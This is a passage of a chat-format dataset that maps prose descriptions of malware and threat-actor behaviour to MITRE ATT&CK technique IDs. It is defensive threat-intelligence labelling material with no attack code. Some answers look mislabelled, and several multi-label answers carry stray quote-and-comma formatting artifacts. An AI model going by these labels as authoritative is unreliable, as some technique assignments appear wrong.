- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can list the running processes and get the process ID and parent process’s ID."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ISMInjector creates scheduled tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The official AutoIt3 interpreter comes as part of the AutoIt installation package, and it is used by the malware to execute the compiled script. The VBS script runs the AutoIt interpreter, passing the compiled script as an argument. Once executed, it loads the library, which was also passed as an argument to call a hardcoded exported function"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can walk through directories and recursively search for strings in files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can encrypt its C2 with RC4 with the password `warzone160\\x00`."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has the capability to perform keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once delivered, Egregor will perform a sequence of language checks in a similar manner to both Maze and Sekhmet, before attempting to enumerate all connected drives. If successful, it connects to a command and control (C2) server to grab a list of directories present on the enumerated drives to search. Any files in these directories are then extracted and sent back to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ScreenCapture: It takes screenshots of the infected machine - Download Secondary Payloads: It downloads additional plugins and other malware - Enterprise-aware: It targets administrators and enterprises networks - Infiltrates the Exchange Server: It collects and steal sensitive information from the Microsoft Exchange mail system, including credentials and the domain certificate"
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KopiLuwak In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world)"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers. Due to their reliance on IE, these malware families intentionally configure the browser settings by modifying the following registry entries"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has come with a signed downloader component."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ acquired and used the Redline password stealer in their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has used first-stage payloads that download additional malware from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropped file is executed after terminating any process with the same name. For persistence, it adds a shortcut for the file at the %STARTUP% directory"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH."
- },
- {
- "role": "assistant",
- "content": "T1098.004 - SSH Authorized Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Function similarity – Important functions in both BYEBY and wincore.dll have almost the same implementation. One such function is the payloads’ main thread function."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RegDuke can hide data in images, including use of the Least Significant Bit (LSB)."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a command, ps, to obtain a listing of processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes: It will target unins000.exe if it is available"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive"
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library', 'T1074.001 - Data Staged: Local Data Staging', 'T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to list all running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has gathered information about local network connections using netstat."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute shell commands using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike uses a custom command and control protocol that can encapsulated in DNS. All protocols use their standard assigned ports."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, one of the samples is able to capture screenshots of the infected system. To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to known where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has collected .PST archives."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware then allows the user to open the file as normal without any indication to the user that anything has occurred"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operating system's name (i.e., the name of the machine) Operating system's OS architecture Operating system's caption Computer system's domain Computer system's username Computer's public IP address"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has encoded data using certutil before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can use `cmd.exe` to execute commands on a victim's system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has collected files from infected systems and uploaded them to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ESET has recently discovered that the BlackEnergy trojan was recently used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET has detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel of accessing the infected systems, in addition to BlackEnergy"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has written malware variants in Visual Basic."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP and HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie runs the command: \"net start >> %TEMP%\\info.dat\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can execute remote commands using Windows Management Instrumentation."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dumped the login data database from \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials."
- },
- {
- "role": "assistant",
- "content": "T1213.001 - Confluence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate. Some malware that has been used by also uses steganography to hide communication in PNG image files."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron exfiltrates data over its email C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used Windows Registry modifications to specify a DLL payload."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke can use HTTP GET requests in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands. menuPass has used malicious macros embedded inside Office documents to execute files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv"
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware gathers system information via Windows Management Instrumentation (WMI)."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has created a user named “monerodaemon”."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit's \"Install-SSP\" Persistence module can be used to establish by installing a SSP DLL."
- },
- {
- "role": "assistant",
- "content": "T1547.005 - Boot or Logon Autostart Execution: Security Support Provider"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession has the ability to use TCP and UDP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has encoded its communications to C2 servers using Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has used a tool that can obtain info about local and global group users, power users, and administrators."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can run to gather information about the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian has the ability to use HTTP for its C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The network mode being set to the host along with the container trying to be deployed as a privileged container. The Docker Hub account of MegawebMaster has numerous public images, five of which have TeamTNT utilities with a significant amount of downloads. These five images include dockgeddon, docker, tornadopw, and dcounter (T1204.003"
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker created password-protected archives on the victims' OWA server so that they could be exfiltrated via a simple HTTP request"
- },
- {
- "role": "assistant",
- "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Brave Prince collects hard drive content and system configuration information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this campaign, Palmerworm is also using stolen code-signing certificates to sign its payloads, which makes the payloads appear more legitimate and therefore more difficult for security software to detect. Palmerworm has been publicly documented using stolen code-signing certificates in previous attack campaigns"
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can decode its payload prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya's initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc."
- },
- {
- "role": "assistant",
- "content": "T1195 - Supply Chain Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe collects the computer name of the victim's system during the initial infection."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hi-Zor deletes its RAT installer file as it executes its DLL payload file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bad Rabbit has masqueraded as a Flash Player installer through the executable file \"install_flash_player.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to enumerate network shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
